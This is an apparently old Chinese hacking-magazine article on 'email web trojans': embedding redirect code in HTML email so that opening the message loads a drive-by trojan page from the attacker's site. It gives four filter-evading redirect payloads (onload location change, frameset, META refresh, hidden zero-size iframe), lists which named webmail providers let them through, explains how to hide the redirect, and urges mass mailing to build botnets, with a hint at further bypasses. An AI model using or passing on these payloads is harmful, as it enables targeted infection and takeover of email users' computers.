大家肯定對(duì)網(wǎng)頁(yè)木馬已經(jīng)很熟悉了,但大家可能對(duì)郵件網(wǎng)頁(yè)木馬還不是很熟悉。其實(shí)這個(gè)也許有些高手以前已經(jīng)發(fā)現(xiàn)并使用很久了。但我一直未見(jiàn)網(wǎng)上及雜志上有此方面的內(nèi)容。這里我就以技術(shù)共享的原則跟大家談?wù)勦]件網(wǎng)頁(yè)木馬的思路及實(shí)現(xiàn)方法。
郵件網(wǎng)頁(yè)木馬的危害巨大，它能化被動(dòng)為主動(dòng)。目前網(wǎng)絡(luò)上流行的網(wǎng)頁(yè)木馬其實(shí)是很被動(dòng)的，它需要被害者點(diǎn)擊目標(biāo)網(wǎng)址。隨著現(xiàn)在網(wǎng)民的安全觀念的增強(qiáng)，網(wǎng)民一般不會(huì)輕易點(diǎn)擊陌生的網(wǎng)址。但郵件網(wǎng)頁(yè)木馬就不一樣了，你可以將電子郵件發(fā)送到你想要攻擊的目標(biāo)信箱。只要你根據(jù)社會(huì)工程學(xué)及心理學(xué)的知識(shí),將郵件的標(biāo)題看上去不明顯像是垃圾郵件或廣告，那么接收者肯定會(huì)點(diǎn)擊此郵件的。只要他點(diǎn)擊了此郵件主題，看了信，哈哈，他就中招了！當(dāng)然你也可以通過(guò)郵件群發(fā)器,這樣的話，傳播速率比普通的網(wǎng)頁(yè)木馬以及電子書木馬不知高多少呢!而且它有個(gè)最大的優(yōu)點(diǎn),那就是具有目標(biāo)可指定性。它可以攻擊你想要的指定用戶。這一點(diǎn)是普通方法無(wú)法比擬的。
郵件網(wǎng)頁(yè)木馬其實(shí)就是在發(fā)E-mail以HTML方式內(nèi)嵌網(wǎng)頁(yè)木馬，使郵件本身成為一張網(wǎng)頁(yè)木馬。到這時(shí)你也許回大呼，我怎么沒(méi)想到??！呵呵，不怕做不到，只怕想不到啊。其實(shí)有些技術(shù)本身并不難，但就是怕不往這方面想啊。我還是趕快轉(zhuǎn)入正題吧，否則，壞柿子扔過(guò)來(lái)啦！閃!
聰明的你此時(shí)可能會(huì)說(shuō)，郵件網(wǎng)頁(yè)木馬豈不是很簡(jiǎn)單啊，只要在發(fā)郵件是選擇以HTML方式發(fā)送，再將網(wǎng)頁(yè)木馬的源代碼寫入即可。事實(shí)上當(dāng)然沒(méi)這么簡(jiǎn)單，因?yàn)閲?guó)內(nèi)的絕大部分電子信箱都對(duì)其中一些關(guān)鍵代碼進(jìn)行的屏蔽過(guò)濾。因而本文將重點(diǎn)研究怎樣突破重圍，在電子郵件中引入網(wǎng)頁(yè)木馬，達(dá)到我們的目的。
一般的網(wǎng)頁(yè)木馬都用到j(luò)avasccript，但絕大部分郵件系統(tǒng)都對(duì)<script>標(biāo)記作了屏蔽。從而我們只能另辟新法。我們可以不直接將網(wǎng)頁(yè)木馬的代碼寫入郵件中，因?yàn)槿绻麑懭氲脑?，有關(guān)代碼會(huì)被屏蔽，網(wǎng)頁(yè)木馬將失效。我們可以寫入轉(zhuǎn)向代碼，使用戶瀏覽此郵件時(shí)轉(zhuǎn)向我們放在自己網(wǎng)站上的網(wǎng)頁(yè)木馬。當(dāng)然，郵件網(wǎng)頁(yè)木馬的難點(diǎn)就在轉(zhuǎn)向代碼。寫轉(zhuǎn)向代碼要有講究，因?yàn)閷懙貌磺擅畹脑挘a將會(huì)被郵件系統(tǒng)屏蔽。
下面筆者來(lái)談?wù)剮追N有效的可以在電子郵件中引入網(wǎng)頁(yè)木馬的且沒(méi)被郵件服務(wù)器屏蔽的轉(zhuǎn)向代碼。因?yàn)榻^大部分郵件系統(tǒng)都對(duì)<script>標(biāo)記作了屏蔽，所以為了轉(zhuǎn)向代碼有效，均不使用JS和VBS標(biāo)記。
1. window.location 法，代碼如下

<body onload="window.location='http://xxxxx';"></body>

2. 框架法，代碼如下

<frameset cols="100%,*"> <frame src="http://xxxxx" scrolling="auto"> </frameset>

其中scrolling參數(shù)值得注意，合理使用可加強(qiáng)隱蔽性。Cols參數(shù)可根據(jù)自己的實(shí)際情況作更改。
3. META標(biāo)志法，代碼如下

<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://xxxxx">

其中CONTENT后面的阿拉伯?dāng)?shù)字是代表過(guò)幾秒中鐘轉(zhuǎn)入目標(biāo)網(wǎng)頁(yè)。
4. iframe內(nèi)幀法

<iframe src="http://xxxxx" width="0" height="0" frameborder="0">

其中width="0" height="0"是引入網(wǎng)頁(yè)的大小尺寸，可以根據(jù)你的實(shí)際需要加以調(diào)整。其中的frameborder參數(shù)也很重要，如果使用的恰當(dāng)?shù)脑?，可以增?qiáng)郵件網(wǎng)頁(yè)木馬的隱蔽性。為了大家看的清楚，我將widt和height均設(shè)置的非零數(shù)值，轉(zhuǎn)向的是網(wǎng)易的首頁(yè)（如果轉(zhuǎn)向的是放在自己網(wǎng)站上的網(wǎng)頁(yè)木馬，呵呵......）。圖1是設(shè)置frameborder=1的效果，圖2是設(shè)置為frameborder=0的效果。
大家由上面兩幅圖即可知道，如果設(shè)置為frameborder=1，郵件中可看見(jiàn)郵件服務(wù)器自動(dòng)加帶的頁(yè)腳廣告。而設(shè)置為frameborder=0，則如圖2所示，它不像普通的信件一樣看見(jiàn)郵件服務(wù)器自動(dòng)加帶的廣告。大家可根據(jù)具體情況選擇frameborder參數(shù)來(lái)獲得最好的偽裝引入效果，使對(duì)方感覺(jué)不到他所瀏覽的郵件是已經(jīng)轉(zhuǎn)向到你的網(wǎng)站上的網(wǎng)頁(yè)木馬.
上述代碼筆者已經(jīng)對(duì)國(guó)內(nèi)的幾乎所有電子信箱作了測(cè)試，如網(wǎng)易，搜狐，新浪，億唐，21CN，TOM等等。以上四種方法各有千秋。第一種方法的適應(yīng)范圍最小。比如網(wǎng)易、億唐都屏蔽了它。但第2、3、4方法在國(guó)內(nèi)的信箱測(cè)試中均通過(guò)。尤其第2、3種方法幾乎百試百靈。當(dāng)然第4種方法也很經(jīng)典，參數(shù)多，隱蔽性強(qiáng)。大家可根據(jù)不同的目標(biāo)信箱選擇最有效的轉(zhuǎn)向引入代碼。
現(xiàn)在只要大家會(huì)制作網(wǎng)頁(yè)木馬（關(guān)于網(wǎng)頁(yè)木馬木馬的制作方法，大家可以參見(jiàn)以往的黑防），擁有了性能優(yōu)秀的后門程序或木馬程序，再配合本文所講的郵件木馬引入技術(shù)的話，貪心的再來(lái)個(gè)郵件群發(fā)，呵呵，你必將為所欲為，肉雞成群。而且，這種方法具有攻擊目標(biāo)可指定性的優(yōu)點(diǎn)！一場(chǎng)暴風(fēng)雪即將來(lái)臨！大家以后還是少在公開(kāi)場(chǎng)合公布信箱喲！當(dāng)然，穩(wěn)妥的措施是郵件服務(wù)器實(shí)行嚴(yán)格個(gè)代碼過(guò)濾，用戶將郵件查看方式設(shè)置為以文本方式查看！
后記：筆者順便還對(duì)幾個(gè)國(guó)外著名的郵箱：hotmail以及Yahoo作了測(cè)試，發(fā)現(xiàn)它們過(guò)濾得都非常嚴(yán)格。上述的4種方法的代碼都被過(guò)濾了。此時(shí)我深感國(guó)內(nèi)郵件提供商與國(guó)外的差距。安全觀念的差距！但hotmail以及Yahoo并不是固若金湯。以色列網(wǎng)絡(luò)安全公司GreyMagic Software已經(jīng)發(fā)現(xiàn)hotmail以及Yahoo郵箱也存在過(guò)濾不嚴(yán)的漏洞。我們可以用同步多媒體集成語(yǔ)言的（SMIL）的HTML＋TIME技術(shù)來(lái)突破屏蔽，實(shí)現(xiàn)轉(zhuǎn)向引入網(wǎng)頁(yè)木馬的目的。慶幸的是此漏洞最近已經(jīng)被hotmail以及Yahoo修補(bǔ)。但國(guó)內(nèi)的幾乎所有電子信箱均存在此漏洞。當(dāng)然深愛(ài)鉆研技術(shù)的你肯定會(huì)問(wèn)，現(xiàn)在是否有針對(duì)hotmail以及Yahoo郵箱的有效的轉(zhuǎn)向引入代碼。答案是肯定的！這個(gè)問(wèn)題留給大家思考，大家可以向xml方向去發(fā)散，相信你一定會(huì)找到的！